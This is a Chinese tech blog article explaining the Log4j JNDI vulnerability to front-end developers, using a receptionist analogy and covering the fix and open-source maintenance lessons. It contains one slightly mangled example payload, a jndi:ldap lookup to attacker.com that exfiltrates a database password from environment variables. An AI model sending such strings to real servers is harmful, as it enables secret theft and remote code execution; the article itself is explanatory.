您的位置 首页 java

给前端开发者解释Log4j漏洞是什么回事

前段时间 Java Log4j 漏洞的话题非常火爆,漏洞影响的范围之大,也是前所未见。根据统计,包括 谷歌 微软 腾讯 百度 滴滴 ,推特, 京东 亚马逊 等等公司的服务都存在漏洞,而他们的用户都是数以亿计。 Log4j 漏洞导致这些用户的隐私数据有泄露的风险。

给前端开发者解释Log4j漏洞是什么回事

Log4j 是 Java 的一个开源库,功能是记录日志。之所以影响范围这么大,和 Java生态的广泛应用不无关系。

给前端开发者解释Log4j漏洞是什么回事


安装 JDK 时的经典截图,可以说明Java的广泛使用,而Java技术栈开发的服务更是数不胜数。Log4j 是最主流、常用的 Java 库之一,因为Java生态的巨大,Log4j 的漏洞才会有这么大的影响。

虽然 Log4j 已经修复了这个漏洞,话题热度也差不多过去了,但是相信还有很多人不清楚这个漏洞的原因。对于 前端开发 来说可能更不清楚漏洞是怎么产生的,学习一下 Log4j 的经验教训对我们以后的开发也大有裨益。

1.漏洞到底是怎么回事

我们来讲个故事,方便大家理解这个漏洞的核心。

L小姐是公司的前台,每天的任务之一就是登记来访人员的信息。她有一张表,每次记录来访人员的姓名,电话,来访时间和具体事项。

给前端开发者解释Log4j漏洞是什么回事


这项任务非常简单,L小姐做的很不错,一直没出什么问题。

直到有一天来了一位先生X,说自己是来参加一个重要会议的。现在会议已经开始了,时间紧急,他先去开会,姓名可以打电话询问。于是他留下一个电话就走了。

给前端开发者解释Log4j漏洞是什么回事

L 小姐拨打了这个电话,电话里面的人说他叫李四,是来参加会议的。顺便又和她聊了几句,问出了CEO明天要出差的信息。

给前端开发者解释Log4j漏洞是什么回事


L 小姐在表格中记下了X先生提供的信息。

给前端开发者解释Log4j漏洞是什么回事

这就是 Log4j 漏洞的主要流程,是不是很简单?

2.漏洞的细节

如果你理解了上面的流程,接下来就很好理解了。Log4j 的日志是基于模板的,类似于L小姐的表格。Log4j 会把模板中的字段替换为真实的值,例如将模板中的日期字段 ${date:yyyy-MM-dd} 替换为真实的日期 2021-12-12

给前端开发者解释Log4j漏洞是什么回事

除此之外,Log4j 还支持查询数据替换,就是你经常看到了 JNDI 。使用JNDI查询的好处是可以通过一个参数查询其他信息,从而替换模板。比如程序中仅传递了用户ID,可以通过JNDI查询用户姓名等信息,然后再替换模板字段,完成日志的记录。JNDI对应的就是L小姐打电话的步骤,也是此次漏洞的核心。

使用JNDI查询也没有问题,因为查询的也是内部服务,不会与外部交互造成信息泄露。然后这里有一个问题:如果JNDI的查询地址里包含 ” : “, JNDI将向该地址发送查询请求,并将查询结果写入日志。

概括该漏洞就是:Log4j记录日志时,JNDI可以向外部地址发送请求。

给前端开发者解释Log4j漏洞是什么回事


只要构造类似 *
{jndi:ldap://attacker.com:1389/ {jndi:ldap://attacker.com:1389/{env:MYSQL_PASSWORD}* 的日志,就能触发这个漏洞。攻击这可以获取 环境变量 ,例如数据库密码等。
前端开发者都知道,向服务器发送请求会携带IP地址,因此攻击者也能够拿到服务器IP地址。借助其他工具攻击者完全有可能获取数据库权限,从而造成大面积的数据泄露。

除了请求会泄露信息外,恶意返回也是非常可怕的。攻击者可以返回恶意代码程序。比如有攻击者返回挖矿程序,让服务器变身矿机。

给前端开发者解释Log4j漏洞是什么回事

3.漏洞的修复

给前端开发者解释Log4j漏洞是什么回事


Log4j 在12月12号发布新版本修复了该漏洞,修复的方式也很简单:

  • 限制JNDI只能访问本地的服务器
  • 禁用大部分JNDI 通讯协议

不能升级 Log4j 的服务可以设置禁用 JNDI 来避免问题。

4.事件的反思

漏洞虽然修复了,但是漏洞的原因还是值得我们的反思。当初支持JNDI查询的原因就是为了 “方便”,又因为只能访问内网服务就没有过多的考量安全性。

虽然这是Java的漏洞,但是目前 Node 在服务端的应用越来越多,前端开发者也应该主要安全问题。

另一个值得反思的是开源项目的支持。Log4j 项目除作者外仅有3个人贡献过代码,很难想象如果此广泛使用的库,维护的人竟然这么少。Log4j 作者也在社交媒体发文报委屈,自己分文未取,出了问题竟然这么多人责难。

开源项目的维护发展确实应该考虑,那些使用这些开源项目的大公司应该提供一些人力参与维护。

欢迎点赞,评论,转发~

文章来源:智云一二三科技

文章标题:给前端开发者解释Log4j漏洞是什么回事

文章地址:https://www.zhihuclub.com/194099.shtml

关于作者: 智云科技

热门文章

网站地图